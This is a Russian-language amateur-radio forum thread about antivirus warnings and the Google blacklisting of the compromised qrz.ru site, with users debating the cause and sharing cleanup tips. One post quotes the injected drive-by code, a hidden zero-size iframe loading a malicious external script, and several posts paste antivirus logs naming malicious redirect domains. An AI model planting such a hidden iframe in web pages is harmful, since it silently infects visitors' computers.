никаких проблем не наблюдаю и как я вижу сервер работает
чётко и быстро. Антивирус Symantec v:10.1.8.8
сетевая версия, иногда ловит троянов, но это с других сайтов.
У нас стоит прокси (ISA).
Ищите троянов и вредоносов у себя в компьютерах!!!!!
При выходе из дома кирпич может свалиться на голову...Цитата:
Сообщение от Andy 811
Чрезмерное потребление чего бы то ни было может повредить вашему здоровью...
Курение может повредить вашему здоровью...
В маршрутке могут ненароком наступить на ногу или помять ребра...
Удивляюсь, как быстро раздули ветку...
Много шума из ничего. :)
илиЦитата:
Сообщение от RX3ZZ
Вот это правильно! Особенно после таких ресурсов как этот.Цитата:
Сообщение от RX9CC
А между тем....
12.04.2010 09:41:42 Network Shield:
blocked access to malicious site www.ua9lak.qrz.ru. 5a2f7a9e41507855.d99q.cn/may.cn/
Вопрос не стоит верите вы или нет, это ваше право.
А я пока, думаю QRZ на долго попал в badware.
Доступ запрещен !Цитата:
Сообщение от RX9CC
Подробности:
Веб-страница:
http://www.ua9lak.qrz.ru.5a2f7a9e415...99q.cn/may.cn/
Описание:
ESET NOD32 Antivirus заблокировал доступ к веб-странице.
Страница находится в списке веб-сайтов с потенциально опасным
содержимым.
www.eset.com
У меня программа NOD-32 не пускает на страницу.
Необязательно, доступ запрещён, а может страница давно удалена по пречине
вируса, а сейчас её нет и она никому не угрожает.
Вот и на это мы видим соответствующее сообщение.
Возможные причины:
•Возможно, сделана опечатка в адресе.
•Если вы щелкнули ссылку, возможно, что она устарела.
Цитата:
Сообщение от RA3TT
не долго ли разбираетесь?? или только банить мгновенно можете?Цитата:
Сообщение от RA9LZ
Андрей , статья оч интересная,но...мне абсолютно по барабану как и зачем трояны распростроняются.Мне главное чтобы когда я открывал страничку этого не было.Ведь НЕ ПОРНО САЙТ же,так?Цитата:
Сообщение от RW3VZ
p.s.:банить наверное полегче будет,чем удалить заразу с сервера...
Опечаток в адресе нет! Это частично криптованая ссылка с адресом где размещен вредоносный код(крипто выделена красным) именно на нее идёт редирект с ua9lak.qrz.ruЦитата:
Сообщение от RX9CC
Если щелкнуть ссылку возможны 3 варианта,
1. Система защиты не позволит соеденится с вредоносными узлами
2. Атака проходит
3. Атака не проходит
Угу... а в яндексе и в гугле сайт в "черный список" внесли тоже из-за наших компов??Цитата:
Сообщение от RX9CC
А Symantec v:10.1.8.8 у нас на работе стоял...чуть всю сеть не положил,избавились от него. "дырявый " как решето. А то,что """У нас стоит прокси (ISA).""" и что??? Как вы его настроите,так и работать будет.
С утра Mozilla Firefox начал выдавать предупреждение, что сайт небезопасен.
http://safebrowsing.clients.google.c.../forum.qrz.ru/
Касперыч на трояны и т.п. не ругается.
Видимо что-то было, потому и попало в базы, а потом подлечили.
Но сайт в черном списке остался - факт.
В IE выводится вот это:
Сведения об ошибке на веб-странице
Агент пользователя: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
штамп времени: Mon, 12 Apr 2010 06:46:37 UTC
Сообщение: 'krquoteit_title' - определение отсутствует
Строка: 125
Символ: 7
Код: 0
URI-код: http://forum.qrz.ru/clientscript/vbu...quick_reply.js
У меня дома в ФФ форум остался в черном списке ибо троян на нем. Сейчас из IE6 с рабочего компа тут на свой страх и риск!
McAfee не ругается. Сейчас просканю CureIt (C) DrWeb.
На главной странице сайта обнаружил установленный эксплоит < iframe src="http://trfistc.info/for.cgi?009" width="0" height="0" style="visibility: hidden;" >< /iframe >, уверен, подобное стоит и на других страницах.
Подробнее см.: http://www.google.com/safebrowsing/d....qrz.ru/&hl=ru
Добавлено через 17 минут
Не каждый антивирус будет ругаться на эксплоиты установленные на сайтах.
Нужен антивирус который сканирует http траффик, правда NOD32 не ругается.
Заблокирован весь домейн qrz.com, но согласно предварительному просмотру кода на сабдомейне forum.qrz.com, вроде как вредоносного кода на форуме нет. Так что пользоваться форумом можно, но осторожно ;-)
Что установлено на Вашем компьютере – антивирус сервер или антивирус клиент? Если клиент, то в таком случае, где установлен сервер?Цитата:
Сообщение от RX9CC
вот что показал ФФ с другого компа:
:sos:
Я так понимаю вы поделились своим горьким жизненным опытьм,спасибо не надо у меня своего хватает!Да и мой совет не надо быть таким твердолобым а надо читать и вникать что пишут люди на форуме и не обвинять меня в том чего нет!Надеюсь доходчиво разьснил и по сему откланяюсь!:slow:Цитата:
Сообщение от RX3ZZ
Добавлено через 1 минуту
Угу и еще на Яндексах и Гуглах,там у них тоже все заражено!Цитата:
Сообщение от RX9CC
Нодыч мой молчит, но агнитум блокирует.
Поэтому и не заметил сразу.
Но просматривая журнал агнитума увидел, что он там что то молча рубил и косил...)))
ну что же админы то молчат?? давайте ребятки,занимайтесь уже делом!!!
даааа,не ожидал...банить,предупреждения там разные(по своему усмотрению!!!!!т.е. по своим законам непонятным) это вам полегче будет!!
Это не ответ. Статистики маловато. Как и со всеми другими сбоями. На cqham.ru в субдоменах тоже не совсем чисто - и ничего.Цитата:
Сообщение от RN9AAA
Мне показалось странным зачем нужен Акробат, но я не знаю до чего сегодня дошло баннероделание и сайтостроение. А если антивирус будет блокировать все процессы происходящие в компьютере без ведома пользователя и потенциально угрожающие стабильности системы - машину можно будет просто не включать. :)
Но если администрация пишет что всё в порядке - я доверяю ей больше, чем пользовательскому ПО. Как я уже писал в большинстве случаев это оказывается оправданно, и проблема в моём компьютере.
Впрочем, нагнетание паники и поиск виноватых видимо для кого-то интереснее.
P.S. Акробат перестал дёргаться после настройки блокиратора скриптов.
Зато после обновления Фаер-Фокса перестал открываться sqham. :)
Да, это сервер в нашей конторе, а установлен антивирус: клиент, обновляетсяЦитата:
Сообщение от RA3DCT
каждую неделю. Ловит паразитов неплохо, в сети более 100 компов все работают
спокойно. Видимо у нас в конторе админ толковый хорошо настроил прокси.
неправда Ваша, больше года стоит на всех компах никто не жалуется, единственныйЦитата:
Сообщение от UN7JID
тормоз это когда базу подгружает, но это всего на 5-10 мин.
Сейчас я дома, стоит NOD32 на двух компах, живём спокойно, правда на QRZ.RU
из дома я захожу редко, отрываюсь на работе...
Плюс за интернет трафиком присматривает именно антивирус сервер, т.о. если например, дома установить клиент, то, к сожалению он может пропустить эксплоиты. Плюс не каждый клиент проверят входящую почту, ибо эта часть также возлагается на антивирус сервер.Цитата:
Сообщение от RX9CC
У меня дома тоже Symantec Antivirus клиент установлен. Достаточно надежный и главное быстрый антивирус.
Но в любом случае антивируса установленного на компьютере недостаточно! Чтобы чувствовать себя спокойно, нужно еще иметь голову. Ни один вирус не защитит на 100%.
Вот уже и Мозилла запускает нормально, и все ярлыки сняты.
Больше шума было..
А Акробат по прежнему дёргается. :)Цитата:
Сообщение от RA9LZ
И в каком месте это все происходит?Цитата:
Сообщение от RA9LZ
Однако. :search:
ну да ну да.....НЕ ВЕРЮ!
У меня на форумы стало нормально,а вот на главную страницу все равно не пускает,там куча рекламы и видимо от баннеров идет атака,на форумах стало чисто!Вот что у меня на главной странице если принудительно зайти,обратите внимание на верхний рекламный баннер и что на его месте!
Свежачок-с!
Вы же утверждали что все ок!Или что доходить наконец то начинает?!Цитата:
Сообщение от R3A-770
Где это я такое утверждал? У меня нет средств, чтобы это утверждать. В моей системе некоторое время почти всё было ОК.Цитата:
Сообщение от Andy 811
Что происходит на сервере - я не знаю.
Я утверждал что ПО сходит с ума что мы здесь и наблюдаем - у одних одно у других другое, и что доверяю администрации сервера.
Конкретно по одному вашему скриншоту я утверждал что проблема не обязательно в вирусах.
Еще один, кем сняты и какие ярлыки. Обьективная реальностьЦитата:
Сообщение от RA9LZ
Главная страница
13.04.2010 8:12:50 система 1376 Sign of "HTML:Iframe-inf" has been found in "http://www.qrz.ru/" file.
про другие
13.04.2010 8:11:54 система 1376 Sign of "JS:Packed-BC [Trj]" has been found in "http://www.ua9lak.qrz.ru./" file.
Вот статистика по этой странице, говорит о том что спокойно сношают после заявления о том что
пароли доступа сменены.(смотри динамику)
03.03.2010 10:03:31 Network Shield: blocked access to malicious site _.ua9lak.qrz.ru.9efe399b3cf0ac0c.d9q.cn/may.cn/
05.03.2010 09:58:11 Network Shield: blocked access to malicious site _.ua9lak.qrz.ru.f783f51ab7da480b.d9q.cn/may.cn/
09.03.2010 10:40:01 Network Shield: blocked access to malicious site _.ua9lak.qrz.ru.8fcab4be83565bee.d9q.cn/may.cn/
16.03.2010 14:20:10 Network Shield: blocked access to malicious site _.ua9lak.qrz.ru.f6ec41deefc0043d.d9q.cn/may.cn/
09.04.2010 10:47:34 Network Shield: blocked access to malicious site _.ua9lak.qrz.ru.77b613322580b903.dq.cn/may.cn/
12.04.2010 09:41:42 Network Shield: blocked access to malicious site _.ua9lak.qrz.ru.5a2f7a9e41507855.d9q.cn/may.cn/
Что об этом думает Google
http://www.google.com/safebrowsing/d....qrz.ru/&hl=ru
Так что не вводите людей в заблуждение...
Работы у вас еще непочатый край.
У меня MOZILA FIREFOX не пускает! кричит и матерится!
И банер у меня был несколько дней назад!
UA9OTY ! Корефан! ты где????????????????:buba_phone:
В отпуске человек, дайте ему спокойно отдохнуть!Цитата:
Сообщение от RZ9OO
Приедет - закончит уборку..
странно тут http://forum.qrz.su браузеры ругаются, а тут http://forum.qrz.ru пока нетЦитата:
Сообщение от R3A-770
может вирусы залазят из Египта
Это что еще за "ЗЕРКАЛО" ???Цитата:
Сообщение от UT1YV
Китайские прохвосты.Цитата:
Сообщение от RN9AAA
P.S. 70% взломов сайтов/компьютеров происходит из Китая!!!
С утра Firefox на форумы пускал без проблем а на главной был запрет,сейчас опять везде капут!
..что за фигня? У меня ничего не происходит....каждый день после захода делаю глубокую проверку всего компа разными антивирями...ничего!
Парни, ну просветите "чайника" :), захожу на сайт каждый день (бывает по нескольку раз), никаких проблем ..тьфу-тьфу , почему эта грязь к одним липнет, к другим нет? ОС- Виста, Опера, Eset Smart Security. Кстати, когда были проблемы на CQ.HAM, у меня тоже никаких проблем не возникло.Цитата:
Сообщение от Andy 811
Про радиацию слышали? Вот и здесь так же, запаха и цвета не имеет, определяетсяЦитата:
Сообщение от RX3DU
приборами. Не считайте киберпреступников дураками, прежде чем разместить
код его тестируют на "невидимость" для средств защиты. Используют разные хитрые приемы.
Существуют так же незакрытые уязвимости приложений и это факт!
---
Проблем особых и у нас нет, мы ведь в этой ветке не свои проблемы обсуждаем-
ресурса QRZ.ru и скорость реакции на них.
Проблема была замечена еще до открытия этой ветки форума.Цитата:
Сообщение от RN9AAA
Разбираемся.
Конструктивные предложения приветствуются.
А замеченная зараза на домашних страничках пользователей - это их забота.
Их забота, а проблемы то ваши? Народ всполошился, неделями антивирями компы сканируют.Цитата:
Сообщение от RW3VZ
Добавлено через 5 минут
Интернет ресурсы имеют свои антивири...обнаружили трояны на этом сайте и блокируют доступ к нему.Это забота о наших компах, и наши антивири пока курят в сторонке..отдыхаютЦитата:
Сообщение от UX0IM
Видимо Опера не давала выполнить некий вирусный скрипт(программый код встроенный в тело сайта) после захода на сайт. Такое бывает.Цитата:
Сообщение от RX3DU
...вот тока щаз сработал Аваст - блокировал подключение к QRZ-ту.Сделал быструю проверку Вебом, Каспером и Авастом - ничего ..."тихо".
На QRZ в день раз по сто захожу, а всё никак не словлю ничего. Стоит XP SP3 со всеми обновлениями+Каспер6+Outpost Fireval Pro 2009. Браузер- IE7. Что хоть делать надо, чтобы увидеть то, что здесь обсуждается?
Или, я уже ужасно инфицирован, а об этом не знаю?
Да нет, вы не правы.Цитата:
Сообщение от RW3VZ
Как раз из-за "их забот" ВЕСЬ домен qrz.ru попадает в черные списки.
Оттого куча неудобств пользователям.
Например тем, кто работает под Mozilla Firefox.
Добавлено через 1 минуту
Дело в том, что заражены бывают поддомены 3-го уровня, сидящие на qrz.ru на которые вы не ходите.Цитата:
Сообщение от Игорь 2
И я хочу, ну никак ничего плохого не вижу. Вот досадно то как.....Цитата:
Сообщение от Игорь 2
Вы не путайте, когда ваш компьютре УЖЕ заразился и две другие ситуации:Цитата:
Сообщение от RX3DU
- антивирус блокирует вредоносный код на html страничке
- доменное имя попало в черные списки различных сервисов в Интернете т.к. на сайтах поддоменов содержались странички с вредоносным кодом.
Вот сейчас ситуация последняя. Из-за влома некоторых поддоменов, сидящих на qrz.ru (типа ua9lak.qrz.ru) весь домен попал в черные списки. Поэтому браузеры типа Mozilla Firefox, Opera ругаются на любой поддомен домена qrz.ru как на ПОТЕНЦИАЛЬНО опасный. Что затрудняет работу.
Никто не говорит, что СЕЙЧАС зайдя на forum.qrz.ru можно что-то подхватить.
А как туда сходить, я в сетевых делах дуб?Цитата:
Сообщение от RA6XTD
Хочется проверить насколько ваш "секс" будет защищенным? :)Цитата:
Сообщение от Игорь 2
Спросите у тех, кто тут писал про ругань антивиров и брандмауэров во время посещения этих страничек. На какие именно поддомены они ходили.
Цитата:
Сообщение от RW3VZ
Заходил с нескольких компов на QRZ.RU и во всех случаях идет предупреждение о наличии вируса на сайте. Так, что причина не в пользователях.
Надо бы навести порядок однако....
Спасибо что подсказал о необходимости действий, доложусь тебе первому.Цитата:
Сообщение от RV9LR
А вот вам: "Лучше туда не ходить! :-)))))))))))Цитата:
Сообщение от RX3AGD
Я ( и куча народу) уже поимели проблемы с баннером сексуального характера!
Серега Илюхин UA9OTY в отпуске, и видать без него как без рук!
73! Александр Сухарев RO9O"
чаво сказать то хотели? смысел не понятен...Цитата:
Сообщение от RA9JM
На фтп к UA9LAK пустите? Помогу реально.Цитата:
Сообщение от RW3VZ
Если требуются конструктивные предложения, то могу могу посоветовать один из методов выявления зараженных страниц (уверен, что 9OTY знает об этом, но может быть будет кому-то ещё полезно).Цитата:
Сообщение от RW3VZ
Итак, как я вижу, на главной странице qrz.ru до сих пор находится эксплоит < iframe src="http : // trfistc.info /for.cgi?009" width="0" height="0" style="visibility: hidden;" >< /iframe >. Сейчас он бездействует, т.к. адрес указанный выше выдаёт ERROR 403: Forbidden. Поэтому антивирусы прекратили "кричать", хотя в Google видят этот код и не снимают бан с домейна.
Видать хакеры приостановили свою черную деятельность. Но наверняка временно.
У меня когда-то были подобные проблемы с коммерческими сайтами. Я сделал следующее. Я не стал сразу удалять вредоносный код, а посмотрел на дату последнего изменения файла в котором находится хакерский код. Если файл не был изменён автором сайта после внедрения эксплоита, то по дате можно искать в логах веб сервера (а также ftp и ssh) кем был внесён этот код. По найденным данным (в частности по IP хакера) можно найти и другие пораженные страницы на сайте и вычистить их.
Труднее всего найти дырки, через которые хакеры пролезли, и если дыры не найдены, то необходимо поменять пароли к базе данных, ФТП и другим сервисам сайта, а также произвести апдейты программ типа форумов. Как правило, дыры находят в популярных программах с открытым кодом.
Кстати, надо убрать упоминания о серверных компонентах со страниц сайта. Так например, в HTML можно увидеть
"Powered by Apache 1.3.33 Unix web server + MySQL 4.1 server"
Кому это надо? Правильно, хакерам.
Добавлено через 2 минуты
боюсь, ФТП будет недостаточно. см. мой коммент вышеЦитата:
Сообщение от RX3QFY
Если захожу на главную страницу:http://www.qrz.ru/ - Касперский блокирует, если сразу на форум:http://forum.qrz.ru/ - всё нормально.
+1Цитата:
Сообщение от 4Z5LZ / RA9APZ
но...
Как раз нет.Цитата:
боюсь, ФТП будет недостаточно. см. мой коммент выше
1. Зная полный исходник от этой явно зараженной страницы можно вычленить потом фреймы от рекламы и фреймы от вируса.
2. НАВЕРНЯКА у кого-то из админов(кроме пользователя той странички) сидит фрейм на компе. Однозначно. У меня его нет, значит есть возможность вычистить через фтп.
Сперва надо найти другие зараженные места, а потом уже чистить. Если сделать наоборот, то метка времени файла изменится, и в логах не удастся ничего найти.Цитата:
Сообщение от RX3QFY
Коллега! Сначала по фтп находим index-файл(index.php или index.html)Цитата:
Сообщение от 4Z5LZ / RA9APZ
Потом смотрим дату изменения. записываем ее. и далее обращаем внимание на содержимое файл. ищем фрейм. копируем код в текстовик.
После всего вышеперечисленного изменение даты не играет роли.Цитата:
Если сделать наоборот, то метка времени файла изменится, и в логах не удастся ничего найти.
Я не навязываюсь, если администрация нуждается в моей помощи - пусть свяжется со мной.
Для разрядки :)
Как баны лепить-так в очередь,а как чистить сайт таки нет никого.....Цитата:
Сообщение от RA9JM
Запарился уже диск форматировать . Ничего его не берет-менял антивирусники и браузеры -все равно пролезает.......
Цитата:
Сообщение от RW3PF
Странно вообще. В понедельник вечером на QRZ.ru подцепил вирус-баннер эротического содержания с предложением отправить смс на такой то номер. Пользовался Эксплорером (хоть и знал что не надо))))). Убил вирус - поставил Оперу - все сразу стало ок! Т.е. вирусы все равно лезут, но их антивирусник (у меня Нод32) уже отлавливает.
Сейчас эксплоит запускает инфицирование в фоновом режиме и если антивирь не запрограммирован на отслеживание фонового режима, то Ваш компьютер инфицируется. Если антивирус работает на такое отслеживание, то после 15-секундного таймаута стартовая страница QRZ.RU виснет в IE7. Обращаю внимание ВСЕХ пользователей, что рекомендую создать закладку в браузере на пряму ссылку форума и ТОЛЬКО ПО НЕЙ проходить на форум. Большая просьба к владельцам персональных страниц - НЕ ОБНОВЛЯЙТЕ пока свой контент. Вы можете заразиться на стартовой странице и потом эту заразу пронести через FTP-доступ во внутрь своего сайта.
С самого начала так сделано. Может поэтому ничего нет....Цитата:
Сообщение от RX3QFY
А вы на главную сходите-потом расскажите.Цитата:
Сообщение от RU4UU
Приветствую и сожалею, что заходите с эксплоера на QRZ . Там сейчас сидит троян. Думаю это не зловредный вирус, а "шуточный" , который приводит например к исчезновению Раб.стола (пустой экран) или не работает : Пуск - Выключение - Выключение/Перегрузка (только выключение от сети 220в) или соединяется с имеющимися в компе прежними ссылками на порно сайты (откуда наверное и взят образ трояна).
Захожу тоже с эксплоера на qrz , но с другого хард-диска (копия основного). На сайте все это время народ шевелится (есть сообщения, немного) , некоторые даже удивляются из-за чего сыр-бор. Рискую так потому, что всегда имею копии на разные даты рабочего хард-диска под рукой, могу перезаписывать хоть каждый вечер чтоб вернуть в вчерашнее состояние без вирусов.
Рекомендация тем, кто «попал» - HijackThis + Google - как пользоваться.
У меня именно так и происходит,потом выскакивает окно отменить исполнение сценария,скрин я выкладавал раньше!После каждого выхода удаляю все куки и т.д!Цитата:
Сообщение от RX3QFY
Сегодня утром все в порядке стало,захожу без проблем и блокировки снялись,даже скорость загрузки страниц возросла!Не знаю на долго или нет но надо чтобы всегда так было!
------------------------
Видимо админ дошел до своего рабочего места,ура!
да, сегодня уже без проблем на форум захожу.С двух разных компов попробовал,два разных антивиря- всё чисто.
На главной трабл остался.Ругается ещё пока.
Вырубил скрипты и захожу с главной. Три банера с "предупреждением". Но они уже выглядят как часть страницы:
1. НОВЫЙ РАДИОЛЮБИТЕЛЬСКИЙ РЕФЛЕКТОР "HamBiz", с подпиской
2. Фрейм - Автоматические антенные тюнеры
3. Фрейм - Begun Купим рекламу на вашем сайте
---------------------
Это всё баннеры с "дружественных сайтов"?
P.S. Дальше рыть не стал. Пусть админы пороют.
это все анимационные авы
Добавлено через 1 минуту
вы мне лучше скажит езачем вам все эти ативирусы, если инет сам предупреждает через браузер
Встречают по одёжке...
Один раз "отличишся" и молва (за счёт сплетен, базарных баб...) о тебе на всю жизнь.
Ошибки заносятся в общий реестр, браузер блокирует - "перестраховывается". В большей части - это правильно.
Ах эти кучи банеров, символ жадности!:beach:
Непорядок устранён.
Гугль дал добро для qrz.ru:
Цитата:
Статус последней проверки на наличие вредоносного ПО для данного сайта: Проверка этого сайта завершена. Подозрительных элементов не обнаружено. В настоящее время происходит удаление сообщений с предупреждениями о вредоносном программном обеспечении из результатов веб-поиска. Имейте в виду, что для выполнения данной процедуры может понадобиться некоторое время.
Любопытно, вот сколько тут жалуются на вирусы (неделю, полторы?), каждый день захожу через главную, ни одного писка и визга. Avira+FF 3.6.3. Стерильно, комп чист, ничего не выскакивает, не лезет...
Ну я один схватил, когда заходил через Internet Explorer вместо Мазилы, которая не пускала.После выхода с qrz просканировал и сразу вычистил.Цитата:
Сообщение от UN7RX
Видимо дело случая.
Цитата:
Сообщение от RW3VZ
Да действительно у меня все тоже ок!Спасибо!
ps А вот на доску обьявлений не пускает,там чего то еще есть!
А вот что антивирус сказал 15.04.2010 20:06:43 http://tikkiab.info/cgi-bin/qo/s00a106201317r0019R8e6fbb13Xc990ca2cY82500238Z0100f080»[/url] отправлен в компанию ESET для анализа.
Да,ни каспер,ни аваст не ругаются!
с ие и мозиллы захожу всё норм!
Спасибо за работу!
Мужики а у кого как когда на доску обьявлений заходите ??? У меня firefox до сих пор туда не пускает а в остальном везде без проблем!
Андрей. Я использую браузеры Apple Safari и Google Chrome. Везде хожу без проблем.
Блин сразу не сообразил,почистил кеш и все стало нормально,спасибо!73!Цитата:
Сообщение от UR3IRS
А вот так сделать? Полазить по настройкам, изучить матчасть...
А мой Каспер ни раньше ни сейчас ничего не видит.Может у меня комп заражен?
позвольте высказать осторожное предположение - у вас заражен БИОС, наверноЦитата:
Сообщение от RW9UB
Ну после "грибков" удивляться нечему...
это вы кому говорите?
А как проверить? Каспера запускаю он в компе никаких вирусов не находит.Цитата:
Сообщение от UT1YV
А чего вы хотели увидеть?Цитата:
Сообщение от RW9UB
Это наверное шутка такая? ))))Цитата:
Сообщение от UT1YV
Я являюсь ситемным администратором и уже лет эдак 15 не слышал, чтоб современные вирусы биос заражали)))
Просто у моего товарища антивирь блокирует главную страницу QRZ.RU.А у меня нет.Цитата:
Сообщение от UX0IM
Если не находит - то скорее всего у Вас ничего и нет. Вирус, который был на QRZ.RU - при загрузке винды вешал баннер с предложением денег отослать на такой то номер. Незаметить его Вы не могли)))Цитата:
Сообщение от RW9UB
Самое подлое в этом вирусе то, что с точки зрения всех антивирустников он вирусом не являлся))
Не в бровь , а в глаз! :)Цитата:
Сообщение от RX4HX
утреннее ... гугля ругается:Цитата:
Сообщение от RW9UB
"QRZ.RU :: Схемы и документация - подробная информация о "УКВ ...Этот сайт может нанести вред Вашему компьютеру.
Описание: УКВ радиоприемник ..."
попробовал выйти на qrz.ru, компьютер завис напрочь.. :(
Не ругается. В любом браузере. Попробуйте с почистить кэш.Цитата:
Сообщение от UA1TDZ
У меня тоже Каспер "лохонулся"... Уж не знаю тут или в другом месте. 1,5 года все было ОК. Но 4 дня назад - кошмар! Помогло вот это, оооочень рекомендую:Цитата:
Сообщение от RW9UB
http://www.freedrweb.com/cureit/
Удачи!!!
Мне понравилась вот эта фраза...Цитата:
Сообщение от UY5LA
То есть, зло будет найдено в любом случае, чисто у вас или нет...Цитата:
Дождитесь окончания сканирования и изучите отчет о проверке. Вам нужны другие доказательства?:)
Что то не скачивается утилита.Цитата:
Сообщение от UY5LA
Некоторые трояны блокируют адреса сайтов антивирусов. Совсем ничего не открывается? Или файл не грузится?Цитата:
Сообщение от RW9UB
Файл не грузится
Только что проверил, файл с сайта скачивается. Попробуйте скачать с компьютера друзей и запишите на CD-RW/Цитата:
Сообщение от RW9UB
Лично мне уже никакие доказательства не нужны. Когда мой KIS 2009 (база обновляется ежедневно) находил, определял нового трояна (дата "рождения" от 14.04.2010), но вместо удаления, перегружал компьютер не закончив проверку, после чего тот становился ну очень медленным.Цитата:
Сообщение от RU4UU
Потом как бы (после удаления в ручную) всё прошло и KIS ничего не находил на самом высоком уровне проверки... но на утро троян оживал.
И только скачав указанную утилиту, уже при быстром сканировании этот гад был уничтожен, а при полном сканировании (около 6 часов) враг был разбит окончательно (ещё 4 штуки).
И вот уже 4-е сутки тьфу, тьфу, тьфу! Так что, "скорая помощь", как они образно назвали утилиту, сработала на 100%:ok:
Бывает. Скачал утреннюю версию, заRARил и залил сюда. В этом случае должно качаться без проблем.Цитата:
Сообщение от RW9UB
Захожу на главну страницу QRZ.RU и антивирус указывает на угрозу. Вчера все было ОК. Ошибка антивируса? У меня АВАСТ-5.
Та же песня...
AVAST пишит в разделе Соревнования . Утром молчал ...
FF и Avira молчат.
Не молчит аваст заблокировал вредоносное соединение.
Больше австу верьте, он на сквозняк из форточки реагирует...
мой AVAST тоже последние пару дней предупреждает о попытках атаки....
А мой перестал возбухать ...
мой тоже, но ведь было...., было.....
Мой пышшал только в "соревнованиях" . А вирусяку всё-таки поймал , когда весь сайт блокировался Каспером , и он , Каспер , убрать его не смог . Аваст позже удалил , даже как-то странно это ...
Друзья, помогите. Что не туда нажал. Вот так отображается форум на "дачном" компе. На "домашнем" все ок. Просьба советы направлять на е-маил rv2fw mail ru
Т.к. читаю с лупой и не могу разглядеть личные сообщения
Вложение 251270Вложение 251271Вложение 251270Вложение 251271Вложение 251270Вложение 251271
И еще просьба модераторам и администраторам ОТКЛЮЧИТЕ К ЭНТОЙ МАТЕРИ МОБИЛЬНЫЙ РЕЖИМ, ОН ТОЛЬКО МЕШАЕТ, КАЖДЫЙ РАЗ надо переходить на версию для ПК в Ios И на полную в андроиде. Ну пожалуйста!!! Ну уже достало!!!
Виктор, Вы изменили масштаб в браузере. Выход из положения отправил на почту.Цитата:
Сообщение от R1DX
Владимир, это невозможно. Этот режим заложен в коде движка, а ковырять его я не буду, можно сломать вообще всё...Цитата:
Сообщение от RN3GP
Спасибо-)) Настоящая помощь друзей и модератора-)) 73!Цитата:
Сообщение от RM6LA
А у меня уже второй раз глюк за пару лет с брайзером.
Не могу попасть на следующую страницу темы, к примеру страница 430, пытаюсь перейти на 431 страницу по ссылке https://forum.qrz.ru/330-160-metrovyy-diapazon-1-81-2-0-mgts/25842-top-band-160-m-431.html
Эта беда в Хроме.
А в Лисе все ОК.
И еще спасибо если кому ставлю - появляется - кто поставил - "Вы и RA3WDK" , прикольно :s7:
Лечится стиранием истории за минимальный период. Ну или отдельно cookies, по идее, если не лень мышкой тыкать.Цитата:
Сообщение от RA3WDK
Почистил историю и cookies - ничего не изменилось - на 431 страницу попасть не могу.
И меня на ВЫ называет и R1DX-))Цитата:
Сообщение от RA3WDK
Странно. У меня именно такая ерунда в Хроме - поставил кому-то "спасибо" или ответил в теме - нормально, пока не вышел с форума. Вышел - на последнюю страницу в теме уже зайти не могу, откидывает на несколько страниц обратно, пока историю за последний час не потру. Может период имеет значение - стереть за месяц или вообще всю историю?Цитата:
Сообщение от RA3WDK
Коронавирус? :)Цитата:
Сообщение от RA3WDK
Может название темы изменить? Некрасиво звучит, это явно не вирус, а глюк. А то сейчас срач начнется...
Так это же кликбейт - чем больше народу кликнет, тем лучше :)
Больше провоцирующих заголовков - длинных и разных! Можно еще добавить "без регистрации и SMS" :)
Теме - 10 лет.Цитата:
Сообщение от RA4NCC
Надо не название менять, а думалку включать. ;)
От хромо совсем отказался. Постоянно где-то лазит и систему стал тормозить. Пользуюсь лисой. И тоже после каждого спасибо появляется ВЫ И RA3QTT - была мысль подпись сменить. Интересно как другие это видят.Цитата:
Сообщение от RA3WDK
Видят точно также. Не обращайте внимания. И жить сразу станет легче.))Цитата:
Сообщение от RA3QTT
Тема про вирусы.Цитата:
Сообщение от RA3WDK
Но позволю себе оффтоп.
Сам только что столкнулся с аналогичной ситуацией (когда видно, что есть страница, но попасть туда не могу).
Но счетчик страниц другой.
И раздел форума другой.
И браузер другой.
Почистил куки и историю.
Пока шёл процесс очистки (чуть ли не двадцать минут), попользовался альтернативным браузером. Там всё ОК.
Ну а потом (после чистки) опять залогинился в родном браузере. Теперь и тут нормально.
Даже не уверен, может и чиститься не обязательно было.
Могла просто конкретная текущая сессия взглюкнуть. Перезагрузка помогла бы.
Так что проблемы - на клиентской стороне. Изучайте матчасть.
---
И впредь - задавайте технические вопросы в соответствующих темах форума, pse.:var:
Есть хорошее расширение для браузеров - автоматически очищает cookies... Сам пользуюсь несколько лет...
Вот ссылки, если кому интересно:
Для "хромообразных" - https://chrome.google.com/webstore/d...mjliifgaodjagh
Для "лисообразных" - https://addons.mozilla.org/ru/firefo...ie-autodelete/
Коронавирус?Цитата:
Сообщение от RX3ZZ
Коллега, пока перечитайте предупреждение в предыдущем сообщении. :var:
При заходе на любую страницу форума антивирь ругается на js/kryptik.bph
Мозила
Пробуем на virustotal "любую" страницу, в данном случае текущую:Цитата:
Сообщение от RV9CX
https://www.virustotal.com/gui/url/8...e772/detection
И при выходе на главную страницу форума и при листании страниц темы и при обновлении текущей страницы антивирь обнаруживает
Вложение 253871
Тревожно чёй-то, не пандемия ли?:s11:
Шутки шутками, но прошу обратить внимание.
Появилось недавно 1-2-3 дня назад, не более.
тоже было, не хороший этот троян....Цитата:
Сообщение от RN3S
Специально набрал в адресной строке
static.qrz.ru
в адресной строке появилось
https://www.qrz.ru/
и браузер открыл главную страницу qrz.ru
никаких вирусов при листании страниц темы ни вообще на сайте никогда не видел
Так мы здесь про форум QRZ, а не про главный сайт.Цитата:
Сообщение от RA9CTW
P.S. Кстати, вот сейчас предупреждения нет. Наверное исправили. Спасибо, если так.
И я про тоже. Адрес форума
forum.qrz.ru/
Я набрал то что в вашем сообщени
static.qrz.ru
Вложение 254200
Сегодня
